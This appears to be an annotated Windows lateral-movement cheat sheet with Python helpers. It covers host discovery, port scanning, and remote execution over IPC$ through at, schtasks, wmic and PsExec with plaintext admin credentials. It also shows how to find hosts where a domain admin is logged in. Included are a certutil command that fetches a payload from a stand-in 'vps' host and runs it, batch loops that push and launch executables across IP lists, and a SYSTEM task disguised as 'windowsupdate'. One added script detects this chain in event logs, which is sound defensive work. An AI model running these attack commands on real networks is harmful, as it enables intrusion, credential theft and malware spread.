Discover live hosts
For + ping loop over a /24; only reply lines (the ones containing "TTL=") are kept, so each hit shows the answering IP and its TTL (64 usually Linux/Unix, 128 usually Windows):
>for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.0.%I | findstr "TTL="
Note that -w is in milliseconds, so -w 1 only catches hosts on the local segment; raise it to a few hundred milliseconds for routed subnets, and remember that a host firewall dropping ICMP hides the host from this sweep entirely.
Resolve domain names to IPs
For + ping loop that resolves every name in a file and keeps the "Pinging name [ip]" line (ping prints it right after DNS resolution, even when the host never replies), filtered to addresses beginning with 192.:
>for /f "delims=" %i in (D:/domains.txt) do @ping -w 1 -n 1 %i | findstr /c:"[192." >> c:/windows/temp/ds.txt
Mapping external assets to internal addresses
1. Save the collected subdomains to a file and resolve them from inside the network with the same ping loop, keeping only names that resolve to private-looking addresses:
>for /f "delims=" %i in (host.txt) do @ping -w 1 -n 1 %i | findstr /c:"[10." /c:"[192." /c:"[172." >> C:/users/public/out.txt
The findstr patterns are first-octet prefix matches, not RFC 1918 checks: "[192." also matches 192.0.2.x and "[172." matches all of 172.0.0.0/8, so verify the hits before treating them as internal.
2. Find the internal DNS server (ipconfig, or scan for hosts with port 53 open) and brute-force subdomains against it with dnsbrute (https://github.com/Q2h1Cg/dnsbrute):
>dnsbrute.exe -domain a.com -dict ziyuming.txt -rate 1000 -retry 1 -server 192.168.1.1:53
3. Scan the internal IP ranges for hosts running web services and collect their page titles.
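The ping loops above leave raw ping output in out.txt / ds.txt. The following is an added example (not from the original page) that parses that output, records which name resolved to which address, checks the address against the exact RFC 1918 ranges instead of the first-octet findstr prefixes, and notes which hosts actually replied and what their TTL suggests about the OS. The sample input is constructed ping output (English and Chinese-locale lines); names that failed to resolve produce no "Pinging ... [ip]" line and therefore no row.

```python
"""Parse the ping output saved by the loops above and classify the results.

Added example, not from the original page. The sample below is constructed
ping output (English and Chinese-locale Windows lines); in practice read the
out.txt / ds.txt written by the for-loops instead.
"""
import ipaddress
import re
import sys

# "Pinging host [ip] ..." / "正在 Ping host [ip] ...": printed once DNS resolves, even if no reply follows
PING_HDR = re.compile(r"\bPing(?:ing)?\s+(\S+)\s+\[(\d{1,3}(?:\.\d{1,3}){3})\]")
# Any reply line, in any locale, carries "<ip> ... TTL=<n>"
REPLY = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3}).*?TTL=(\d+)")

# Exact RFC 1918 ranges; findstr "[192." / "[172." only looks at the first octet
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def rfc1918(ip):
    """True only for 10/8, 172.16/12 and 192.168/16 (so not 192.0.2.x or 172.67.x.x)."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in RFC1918)


def os_guess(ttl):
    """Rough OS guess from the initial TTL (64 Linux/Unix, 128 Windows, 255 network gear);
    each hop subtracts one, so compare against the band rather than the exact value."""
    if ttl is None:
        return None
    if ttl <= 64:
        return "linux/unix"
    if ttl <= 128:
        return "windows"
    return "network device"


def parse_ping_log(text):
    """Return (name -> resolved ip, ip -> TTL of the reply)."""
    resolved, ttls = {}, {}
    for line in text.splitlines():
        m = PING_HDR.search(line)
        if m:
            resolved[m.group(1)] = m.group(2)
            continue
        m = REPLY.search(line)
        if m:
            ttls[m.group(1)] = int(m.group(2))
    return resolved, ttls


def build_report(resolved, ttls):
    """One row per resolved name, then one per bare IP that replied but had no name (the /24 sweep)."""
    rows = []
    for name, ip in sorted(resolved.items()):
        rows.append({"name": name, "ip": ip, "internal": rfc1918(ip),
                     "alive": ip in ttls, "os": os_guess(ttls.get(ip))})
    named = set(resolved.values())
    for ip in sorted(ttls, key=ipaddress.ip_address):
        if ip not in named:
            rows.append({"name": None, "ip": ip, "internal": rfc1918(ip),
                         "alive": True, "os": os_guess(ttls[ip])})
    return rows


# Constructed sample: two real internal hits, two first-octet false positives, one bare-IP sweep hit
SAMPLE = """\
Pinging portal.corp.example [10.20.30.40] with 32 bytes of data:
Reply from 10.20.30.40: bytes=32 time=2ms TTL=128

正在 Ping vpn.corp.example [172.20.1.9] 具有 32 字节的数据:
请求超时。

Pinging www.corp.example [172.67.8.1] with 32 bytes of data:
Reply from 172.67.8.1: bytes=32 time=20ms TTL=54

Pinging cdn.corp.example [192.0.2.10] with 32 bytes of data:
Request timed out.

Pinging 192.168.0.7 with 32 bytes of data:
Reply from 192.168.0.7: bytes=32 time<1ms TTL=64
"""

if __name__ == "__main__":
    # A Chinese-locale Windows writes the file in GBK; decode errors are replaced, the ASCII parts still parse
    text = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE
    for r in build_report(*parse_ping_log(text)):
        print(f"{r['name'] or '-':28} {r['ip']:16} internal={r['internal']!s:5} alive={r['alive']!s:5} os={r['os']}")
```

Run it against the collected file (`python parse_ping.py C:\users\public\out.txt`); with no argument it prints the sample, where www.corp.example (172.67.8.1) and cdn.corp.example (192.0.2.10) are the entries the findstr prefixes would have wrongly counted as internal.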
Common ports and their services
| Service | Port |
|---|---|
| MSSQL | 1433 |
| SMB | 445 |
| WMI (RPC endpoint mapper; DCOM then switches to a dynamic high port) | 135 |
| WinRM | 5985 (HTTP), 5986 (HTTPS) |
| RDP | 3389 |
| SSH | 22 |
| Oracle | 1521 |
| MySQL | 3306 |
| Redis | 6379 |
| PostgreSQL | 5432 |
| LDAP | 389 (636 for LDAPS) |
| SMTP | 25 |
| POP3 | 110 |
| IMAP | 143 |
| Exchange (OWA/EWS over HTTPS) | 443 |
| VNC | 5900 |
| FTP | 21 |
| rsync | 873 |
| MongoDB | 27017 |
| Telnet | 23 |
| SVN | 3690 |
| Java RMI | 1099 |
| CouchDB | 5984 |
| pcAnywhere | 5632 |
| Web | 80-90, 8000-10000, 7001, 9200, 9300 |
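To turn the table into something runnable, and to cover step 3 of the asset-mapping section (finding internal web services and their titles), here is an added example that is not part of the original page: a threaded TCP connect sweep over exactly the ports listed above, which labels open ports with the table's service names and fetches the HTTP title from ports that look like web services. The target list in main() is a constructed placeholder, and the timeouts, thread count and the decision to skip certificate validation on 443 (self-signed intranet certs) are this example's choices.

```python
"""TCP connect sweep over the ports in the table above, with an HTTP title grab for web ports.

Added example, not from the original page. The port list and labels are the
table's; the target list in main() is a constructed placeholder, and the
connect timeout / thread count are this example's choices.
"""
import re
import socket
import ssl
import sys
from concurrent.futures import ThreadPoolExecutor

# Service -> port spec, copied from the table above (the web entry is a range spec)
SERVICE_PORTS = {
    "mssql": "1433", "smb": "445", "wmi/rpc": "135", "winrm": "5985", "rdp": "3389",
    "ssh": "22", "oracle": "1521", "mysql": "3306", "redis": "6379", "postgresql": "5432",
    "ldap": "389", "smtp": "25", "pop3": "110", "imap": "143", "exchange": "443",
    "vnc": "5900", "ftp": "21", "rsync": "873", "mongodb": "27017", "telnet": "23",
    "svn": "3690", "java rmi": "1099", "couchdb": "5984", "pcanywhere": "5632",
    "web": "80-90,8000-10000,7001,9200,9300",
}
HTTP_PORTS = {443, 5985}  # besides the "web" spec, these speak HTTP(S) too
TITLE_RE = re.compile(rb"<title[^>]*>(.*?)</title>", re.I | re.S)


def parse_port_spec(spec):
    """'80-90,7001' -> sorted unique ints; rejects anything outside 1-65535."""
    ports = set()
    for part in filter(None, (p.strip() for p in spec.split(","))):
        lo, _, hi = part.partition("-")
        lo, hi = int(lo), int(hi or lo)
        if not 1 <= lo <= hi <= 65535:
            raise ValueError(f"bad port range: {part}")
        ports.update(range(lo, hi + 1))
    return sorted(ports)


def port_labels():
    """port -> list of table entries claiming it (9200 is listed explicitly and also sits in 8000-10000)."""
    labels = {}
    for name, spec in SERVICE_PORTS.items():
        for p in parse_port_spec(spec):
            labels.setdefault(p, []).append(name)
    return labels


def extract_title(body):
    """<title> text from an HTML body; intranet apps are often GBK, so try UTF-8 first, then GBK."""
    m = TITLE_RE.search(body)
    if not m:
        return ""
    raw = re.sub(rb"\s+", b" ", m.group(1)).strip()
    for enc in ("utf-8", "gbk"):
        try:
            return raw.decode(enc)
        except UnicodeDecodeError:
            pass
    return raw.decode("latin-1")


def http_title(host, port, timeout=2.0):
    """GET / and return (status line, title); TLS on 443 without certificate validation."""
    sock = socket.create_connection((host, port), timeout=timeout)
    if port == 443:
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        sock = ctx.wrap_socket(sock, server_hostname=host)
    with sock:
        sock.sendall(f"GET / HTTP/1.0\r\nHost: {host}\r\nConnection: close\r\n\r\n".encode())
        data = b""
        while len(data) < 65536:
            chunk = sock.recv(4096)
            if not chunk:
                break
            data += chunk
    status = data.split(b"\r\n", 1)[0].decode("latin-1", "replace")
    return status, extract_title(data)


def is_open(host, port, timeout=0.5):
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def scan_host(host, ports, timeout=0.5, workers=64):
    """{port: info} for open ports; info carries the table labels plus status/title for HTTP-looking ones."""
    labels = port_labels()
    with ThreadPoolExecutor(max_workers=workers) as pool:
        hits = [p for p, ok in zip(ports, pool.map(lambda p: is_open(host, p, timeout), ports)) if ok]
    result = {}
    for p in hits:
        info = {"services": labels.get(p, ["?"])}
        if "web" in info["services"] or p in HTTP_PORTS:
            try:
                info["status"], info["title"] = http_title(host, p)
            except OSError as e:  # ssl.SSLError is an OSError too
                info["error"] = str(e)
        result[p] = info
    return result


if __name__ == "__main__":
    targets = sys.argv[1:] or ["127.0.0.1"]  # constructed placeholder; pass hosts on the command line
    all_ports = sorted(port_labels())
    for h in targets:
        for p, info in sorted(scan_host(h, all_ports).items()):
            print(h, p, info)
```

A connect scan completes the TCP handshake, so it is logged by anything watching connections on the target; that is the trade-off for needing no raw sockets or admin rights on the scanning host.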
Command execution, IPC$ and scheduled tasks
Establish the connection
>net use \\192.168.52.20\ipc$ "password" /user:domain\administrator
List current connections
>net use
List files on the target
>dir \\192.168.52.20\c$
Check the target's system time (at/schtasks times are the target's local time)
>net time \\192.168.52.20
Upload a file
>copy 1.exe \\192.168.52.20\c$
Download a file
>copy \\192.168.52.20\c$\1.exe 1.exe
Batch IPC: a batch file (hence %%i) that opens a PsExec shell on every host in ip.txt. PsExec copies its PSEXESVC service to the target and registers it, which shows up as a service-installation event there.
```bat
@echo off
echo check ip addr config file...
if not exist ip.txt echo ip addr config file ip.txt does not exist! & goto end
echo read and analysis file...
rem one PsExec shell per host; the page's original line also chained "start cmd /c PsExec.exe \\%%i -u administrator -p "123456" cmd", which only opens a second, identical session
for /F "eol=#" %%i in (ip.txt) do start PsExec.exe \\%%i -accepteula -u administrator -p "123456" cmd
:end
exit
```
AT
The at service is deprecated: at.exe is still present on Windows 8 / Server 2012 and later but refuses to run, so this only works against Windows 7 / Server 2008 R2 and older; use schtasks (next section) for newer targets. at jobs run as SYSTEM and non-interactively, at the target's local time, hence the net time query first.
>net use \\192.168.52.20\ipc$ "password" /user:domain\administrator
>copy 1.exe \\192.168.52.20\c$
>net time \\192.168.52.20
>at \\192.168.52.20 1:00AM c:\1.exe
>at \\192.168.52.20 1:00AM cmd.exe /c "ipconfig >c:/1.txt"
>type \\192.168.52.20\c$\1.txt
List scheduled jobs
>at \\192.168.52.20
Delete a job
>at \\192.168.52.20 <job ID> /delete
Batch lateral callbacks with atexec: fetch the payload with certutil, run it, then the page's cleanup call against certutil's URL cache
>atexec.exe ./administrator:pass@192.168.52.20 "certutil.exe -urlcache -split -f http://vps:80/shell.txt c:/windows/debug/SysDug.exe"
>atexec.exe ./administrator:pass@192.168.52.20 "c:/windows/debug/SysDug.exe"
>atexec.exe ./administrator:pass@192.168.52.20 "certutil.exe -urlcache -split -f c:/windows/debug/SysDug.exe delete"
Schtasks
>net use \\192.168.52.20\ipc$ "password" /user:"domain\administrator"
List scheduled tasks
>schtasks /query /fo LIST /v
Upload the file
>copy ok.exe \\192.168.52.20\c$\windows\temp
Create the task remotely (runs as SYSTEM with highest privileges, daily at 20:28 target time)
>schtasks /create /s "192.168.52.20" /u "admin" /p "qqq23" /RL HIGHEST /F /tn "windowsupdate" /tr "c:\windows\temp\ok.exe" /sc DAILY /mo 1 /ST 20:28 /RU SYSTEM
Query the task just created
>schtasks /query /s "192.168.52.20" /U "admin" /P "qqq23" | findstr "windowsupdate"
Run it immediately instead of waiting for the trigger
>schtasks /run /tn windowsupdate /s "192.168.52.20" /U "admin" /P "qqq23"
Delete the task
>schtasks /Delete /tn windowsupdate /F /s "192.168.52.20" /u "admin" /p "qqq23"
Drop the IPC$ connection (net use, not net user: the page's original "net user name /del" deletes a local account instead)
>net use \\192.168.52.20\ipc$ /del /y
Batch lateral callbacks over admin$ + WMI (admin$ is C:\Windows, so admin$\debug\ is the c:\windows\debug path passed to wmic; the ping to 127.0.0.1 is an 8-second sleep). Typed at the prompt, %errorlevel% inside a one-line for is expanded once before the loop runs, so the success check is done with && instead:
>for /f %i in (ip.txt) do net use \\%i\admin$ /user:"administrator" "password" && copy ok.exe \\%i\admin$\debug\ /Y & wmic /NODE:"%i" /user:"administrator" /password:"password" PROCESS call create "c:\windows\debug\ok.exe" & @ping 127.0.0.1 -n 8 >nul & net use \\%i\admin$ /del
WMIC
>net use \\192.168.52.20\ipc$ "password" /user:"domain\administrator"
>copy ok.exe \\192.168.52.20\c$\windows\temp
>wmic /NODE:"192.168.52.20" /user:"administrator" /password:"password" PROCESS call create "c:\windows\temp\ok.exe"
>del \\192.168.52.20\c$\windows\temp\ok.exe /F
>net use \\192.168.52.20\c$ /del
wmic returns as soon as the process is created (ReturnValue = 0 and a ProcessId on success) and carries none of its output back, so the payload has to call back on its own. The ipc$ connection from the first step is still listed by net use after the c$ one is removed and needs its own /del. wmic.exe is deprecated in current Windows 10/11 builds and may be absent on recent ones; PowerShell's Invoke-CimMethod against Win32_Process does the same call.
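Every variant above (PsExec, at, schtasks, wmic) leaves the same footprint on the target: an admin-share access from a remote IP (Security event 5140 on IPC$, C$ or ADMIN$), followed within minutes by a scheduled-task creation (4698), a service installation (System event 7045, PsExec's PSEXESVC) or a process created under WmiPrvSE.exe (4688 with that parent), often from c:\windows\temp or c:\windows\debug. The following is an added example, not part of the original page, of a correlation rule over such events; the field names follow the real events but the records, hosts, times and IPs are constructed, and the ten-minute window and the staging-directory list are this example's choices.

```python
"""Spot the IPC$ -> copy -> at/schtasks/wmic/PsExec execution chain in Windows event logs.

Added example, not from the original page: a small correlation rule run over
constructed event records. Field names follow the real events (Security 5140,
4698, 4688 and System 7045); the records, hosts, times and IPs are made up.
"""
import re
from datetime import datetime, timedelta

# Drop locations the commands above write to; anything launched from them is suspect
STAGING_DIRS = ("\\windows\\temp\\", "\\windows\\debug\\", "\\users\\public\\")
ADMIN_SHARES = {"ADMIN$", "C$", "IPC$"}
WINDOW = timedelta(minutes=10)  # share access -> execution gap we still tie together


def staged(path):
    return any(d in path.lower() for d in STAGING_DIRS)


def exec_primitive(ev):
    """(description, executed path) if this event is a remote-execution primitive, else None.
    4698 = scheduled task created (at / schtasks), 7045 = service installed (PsExec's PSEXESVC),
    4688 = process created; a child of WmiPrvSE.exe is what 'wmic process call create' produces."""
    eid = ev["id"]
    if eid == 4698:
        m = re.search(r"<Command>(.*?)</Command>", ev.get("TaskContent", ""), re.S)
        path = m.group(1) if m else ""
        return f"scheduled task {ev['TaskName']} runs {path}", path
    if eid == 7045:
        return f"service {ev['ServiceName']} runs {ev['ImagePath']}", ev["ImagePath"]
    if eid == 4688:
        new, parent = ev["NewProcessName"], ev.get("ParentProcessName", "")
        if parent.lower().endswith("wmiprvse.exe"):
            return f"WMI-spawned process {new}", new
        if staged(new):
            return f"process started from staging dir {new}", new
    return None


def correlate(events):
    """Pair each execution primitive with a preceding admin-share access (5140) on the same host
    within WINDOW; execution from a staging dir is reported even without one."""
    events = sorted(events, key=lambda e: datetime.fromisoformat(e["time"]))
    share_hits, alerts = [], []
    for ev in events:
        t = datetime.fromisoformat(ev["time"])
        if ev["id"] == 5140:
            if ev["ShareName"].split("\\")[-1].upper() in ADMIN_SHARES:
                share_hits.append((t, ev["host"], ev["IpAddress"], ev["SubjectUserName"]))
            continue
        hit = exec_primitive(ev)
        if not hit:
            continue
        label, path = hit
        src = next((s for s in share_hits if s[1] == ev["host"] and timedelta(0) <= t - s[0] <= WINDOW), None)
        if src:
            alerts.append({"time": ev["time"], "host": ev["host"], "source_ip": src[2],
                           "user": src[3], "what": label, "staged": staged(path)})
        elif staged(path):
            alerts.append({"time": ev["time"], "host": ev["host"], "source_ip": None,
                           "user": ev.get("SubjectUserName"), "what": label, "staged": True})
    return alerts


# Constructed records: the schtasks walkthrough above on WS20, a wmic launch on WS21, a benign task on WS22
EVENTS = [
    {"time": "2024-03-01T20:20:02", "host": "WS20", "id": 5140, "ShareName": "\\\\*\\IPC$",
     "IpAddress": "192.168.52.5", "SubjectUserName": "administrator"},
    {"time": "2024-03-01T20:20:03", "host": "WS20", "id": 5140, "ShareName": "\\\\*\\C$",
     "IpAddress": "192.168.52.5", "SubjectUserName": "administrator"},
    {"time": "2024-03-01T20:21:10", "host": "WS20", "id": 4698, "SubjectUserName": "admin",
     "TaskName": "\\windowsupdate",
     "TaskContent": "<Task><Actions><Exec><Command>c:\\windows\\temp\\ok.exe</Command></Exec></Actions></Task>"},
    {"time": "2024-03-01T20:28:05", "host": "WS20", "id": 4688, "SubjectUserName": "SYSTEM",
     "NewProcessName": "C:\\Windows\\Temp\\ok.exe", "ParentProcessName": "C:\\Windows\\System32\\svchost.exe"},
    {"time": "2024-03-01T20:30:00", "host": "WS21", "id": 4688, "SubjectUserName": "administrator",
     "NewProcessName": "C:\\Windows\\debug\\ok.exe", "ParentProcessName": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"},
    {"time": "2024-03-01T09:00:00", "host": "WS22", "id": 4698, "SubjectUserName": "svc_backup",
     "TaskName": "\\Backup\\Nightly",
     "TaskContent": "<Task><Actions><Exec><Command>C:\\Program Files\\Backup\\run.exe</Command></Exec></Actions></Task>"},
]

if __name__ == "__main__":
    for a in correlate(EVENTS):
        print(a)
```

On the sample this yields three alerts: the windowsupdate task and its later SYSTEM launch on WS20, both tied to 192.168.52.5 through the share access, and the WmiPrvSE.exe child on WS21, reported without a source because no share was touched (wmic alone needs no file copy). The nightly backup task on WS22 is ignored. 4698 requires "Audit Other Object Access Events" and 4688 with the parent field requires process-creation auditing, so the rule is only as good as the audit policy on the targets.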
Quickly locate machines where a domain admin has logged in
Run tasklist /v on every host and look for processes whose User Name column is the domain admin account: an interactive process such as explorer.exe under that account means a live logon session, and therefore that account's credentials, on that box.
>psexec -accepteula @ips.txt -u admin -p pass@123 -c 1.bat
1.bat contents:
```bat
tasklist /v | find "domain admin name"
```
Alternative without PsExec, querying each host's process list remotely over RPC from a batch file and collecting everything in one result file, each host's output preceded by its IP:
```bat
@echo off
echo check ip addr config file...
if not exist ip.txt echo ip addr config file ip.txt does not exist! & goto end
echo read and analysis file...
for /F "eol=#" %%i in (ip.txt) do echo %%i & (echo %%i & tasklist /s %%i /u administrator /p pass@123 /v) >>d:\result.txt
:end
exit
```
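The result file the batch above produces is a sequence of IP lines, each followed by one host's tasklist output (or an ERROR line for hosts that could not be reached). Here is an added example, not from the original page, that reads such a file and lists the hosts on which any of the given accounts owns a process; it assumes the tasklist call was given /fo csv as well, selects the User Name column by position because the CSV header is localized on non-English Windows, and the sample file below is constructed.

```python
"""Find which hosts have a domain admin's processes, from the result.txt the batch above writes.

Added example, not from the original page. Expects each host block to start
with the IP line the batch echoes, followed by tasklist output produced with
/fo csv (add that switch to the tasklist call); the sample below is constructed.
"""
import csv
import io
import re
import sys

IP_LINE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
USER_COL = 6  # "User Name" is the 7th column of tasklist /v /fo csv; indexed because headers are localized


def split_by_host(text):
    """{ip: block text}, splitting on the bare IP lines the batch echoes before each host's output."""
    blocks, host, buf = {}, None, []
    for line in text.splitlines():
        if IP_LINE.match(line.strip()):
            if host is not None:
                blocks[host] = "\n".join(buf)
            host, buf = line.strip(), []
        else:
            buf.append(line)
    if host is not None:
        blocks[host] = "\n".join(buf)
    return blocks


def process_users(block):
    """Lowercased account names owning processes in one host's tasklist CSV; an ERROR block yields an empty set."""
    rows = list(csv.reader(io.StringIO(block)))
    users = set()
    for row in rows[1:]:  # rows[0] is the CSV header (or the single ERROR line, leaving nothing to read)
        if len(row) > USER_COL and row[USER_COL] not in ("", "N/A"):
            users.add(row[USER_COL].lower())
    return users


def find_sessions(text, targets):
    """{ip: [matched accounts]} for every host where one of the target accounts owns a process."""
    wanted = {t.lower() for t in targets}
    hits = {}
    for host, block in split_by_host(text).items():
        matched = sorted(process_users(block) & wanted)
        if matched:
            hits[host] = matched
    return hits


# Constructed result file: one workstation with an ordinary user, one with the domain admin, one unreachable
SAMPLE = '''\
192.168.52.20
"Image Name","PID","Session Name","Session#","Mem Usage","Status","User Name","CPU Time","Window Title"
"System Idle Process","0","Services","0","8 K","Unknown","NT AUTHORITY\\SYSTEM","1:02:03","N/A"
"explorer.exe","1234","Console","1","45,000 K","Running","CORP\\jdoe","0:00:05","N/A"
192.168.52.21
"Image Name","PID","Session Name","Session#","Mem Usage","Status","User Name","CPU Time","Window Title"
"explorer.exe","2222","RDP-Tcp#1","2","50,100 K","Running","CORP\\Administrator","0:00:09","N/A"
"mmc.exe","2300","RDP-Tcp#1","2","30,000 K","Running","CORP\\administrator","0:00:01","Active Directory Users and Computers"
192.168.52.22
ERROR: The RPC server is unavailable.
'''

if __name__ == "__main__":
    # usage: python find_da.py d:\result.txt CORP\Administrator [more accounts]; no arguments runs the sample
    text = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE
    targets = sys.argv[2:] or ["CORP\\Administrator"]
    for host, users in find_sessions(text, targets).items():
        print(host, users)
```

Account comparison is case-insensitive because Windows reports the name as it was typed at logon, so CORP\Administrator and CORP\administrator on the sample's second host collapse into one match.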
